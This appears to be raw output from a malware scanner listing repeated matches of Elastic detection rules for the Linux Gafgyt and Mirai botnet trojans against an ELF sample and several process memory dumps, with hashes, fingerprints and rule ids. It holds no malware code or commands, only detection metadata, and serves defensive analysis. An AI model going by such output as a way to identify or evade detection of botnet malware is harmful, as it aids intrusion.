Source: x86_64.nn.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_d4227dbf | reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_d996d335 | reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_620087b9 | reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_33b4111a | reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE | Matched rule: Linux_Trojan_Mirai_520deeb8 | os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE | Matched rule: Linux_Trojan_Mirai_01e4a728 | os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE | Matched rule: Linux_Trojan_Mirai_e0cf29e2 | os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_9e9530a7 | reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_807911a2 | os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d4227dbf | reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d996d335 | reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_620087b9 | reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_33b4111a | reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
      Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
